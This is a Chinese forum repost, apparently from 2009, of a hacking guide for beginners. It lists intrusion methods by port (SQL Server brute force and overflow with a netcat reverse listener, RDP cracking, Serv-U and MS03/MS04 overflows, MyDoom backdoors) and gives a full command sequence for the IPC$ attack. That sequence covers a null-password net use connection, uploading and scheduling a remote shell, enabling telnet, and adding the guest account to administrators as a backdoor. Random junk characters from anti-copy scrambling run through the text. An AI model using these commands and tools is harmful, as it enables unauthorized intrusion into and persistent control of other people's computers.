TA的每日心情 | 衰
2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu1 g. W U5 n1 j: p0 k
希望对新手入侵有帮助! 7 K8 p& l1 t+ }$ k
1. 1433端口入侵
2 y1 }$ Z) b1 W0 e scanport.exe 查有1433的机器
9 M, R" a2 d9 [* s* g5 h, R SQLScanPass.exe 进行字典暴破(字典是关键)
1 S7 u/ v5 d8 F( j! z$ }4 A 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。2 }, R+ ?0 a' G
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
- `* G7 E2 T5 {3 s4 h+ u8 S, `) s (以上反向的,测试成功)
/ Y' Z8 C+ u/ m sqlhelloz.exe 入侵ip 1433 (这个是正向连接)6 K3 @# u7 @0 L3 A8 l3 f' o
2. 4899端口入侵7 Z8 c. s1 m# e1 @ a
用4899过滤器.exe,扫描空口令的机器
# V" [! L1 I6 w8 K- R/ z: u7 O7 B; r 3. 3899的入侵* A; H9 g8 u0 F2 w3 ?/ `9 j
对很早的机器,可以试试3389的溢出(win3389ex.exe)
; x2 {: {: C! X' B7 g& u8 G 对2000的机器,可以试试字典暴破。(tscrack.exe)5 k- Y! n$ c7 [
4. 80入侵( a( r; g/ w" d T2 f9 f( a
对sp3以前的机器,可以用webdav入侵;
u+ s( Q) S5 G5 D 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)+ }( u, {8 s+ g2 c; g4 T4 H0 Z
可以利用SQL进行注入。(啊D的注入软件)。' y6 W N% b1 z: Q8 y* I* y+ H3 H: @, A
5. serv-u入侵(21端口)6 L( h% i" R; f, J
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
0 u- X4 g! b5 v7 n3 @4 c# ~ 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe). i3 A: G T( D% @" ~5 `6 v
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs). c: R$ S, g% Z' }6 W
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码% z7 K; `7 w; P' D+ O" Q
6. 554端口* X3 x; ?# L! s( j$ C
用real554.exe入侵。( H3 o) _7 m& B$ N' ?- x2 _
7. 6129端口 |. W" }/ ~4 A2 r
用DameWare6129.exe入侵。
# e$ A! X! H2 X) f% h1 e) i: R& B 8. 系统漏洞/ C" c# l5 `) j. m9 f
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。- g, O: w+ F) q$ b' M) k" T
9. 3127等端口8 a) S; z# k4 `# d6 r, i
* `$ \; ^9 ]! ?0 ]$ ?/ Y O. C6 u8 d 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。6 T( e+ z0 M# Y( ]* p- s9 a
10. 其他入侵6 i& {/ t( B8 k G8 {6 o3 N
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
4 X$ D# L# P# B1 v
% a/ f. j5 k O 经典IPC$入侵$ U, K' j4 U. H
, ]; |$ g6 V. o- i 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"* i& r$ W4 I% L$ A( V1 E! K
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。% M' X# \5 h. P& a) [& z' C% g
2. C:\>copy srv.exe $">\\127.0.0.1\admin$' \1 n/ D+ W( O9 c. a) X
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
: F' c n% k" ~+ J! k) T( g1 x( B 3. C:\>net time file://127.0.0.1/
) f- V! l3 I/ p. N 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
* u' o) j1 S1 F; P0 L 4. C:\>at file://127.0.0.1/ 11:05 srv.exe* Q! H- q3 O7 _/ I' k' o7 q, [0 ?3 a
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.- j* U1 g8 }' {3 X2 [
5. C:\>net time file://127.0.0.1/
1 V6 d# K* I! ^9 K- F. [ 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。& G M, a4 t8 S3 ~
6. C:\>telnet 127.0.0.1 99- [3 S4 @( t c: N* D" y
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
; c" ^7 Z( ^: ]5 z8 S' i9 D# a 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了$ x! d# n0 x/ |2 U7 }0 y" O |
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
" L( B8 D% d. Q) e 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
% w; o- m2 i7 i 8. C:\WINNT\system32>ntlm' M% g' Z5 } G) s" A! }7 m7 A
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! F) c) M1 [/ g7 P8 ^" H1 I
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组; Q1 ?/ d" c2 D
10. C:\>net user guest /active:yes
' x% b, }3 ]7 U) f9 p9 x 将对方的Guest用户激活
9 F) H. ^) C1 W! E 11. C:\>net user guest 12348 w! C; K/ r: J1 I4 p4 ~' o
将Guest的密码改为1234,或者你要设定的密码
0 l+ U; x) \1 Y1 ^- r* u8 ?/ F 12. C:\>net localgroup administrators guest /add0 E- _# v& ~! G' M( p$ j0 X
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|
晒晒我家乡的“夏花、秋枫、冬雪” 上集
大学毕业证+驾驶证=找工作更容易!经贸学车
916壁虎轮换社青秀山烧烤
:◢▇▇▇▇经贸学院音乐社所有传奇人物②
第五届校运会——开幕式
|版主考核中心|『经贸在线』
( 桂ICP备15001539号-2 ) 
IP卡
狗仔卡
发表于 2009-10-16 03:00:18
收藏
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡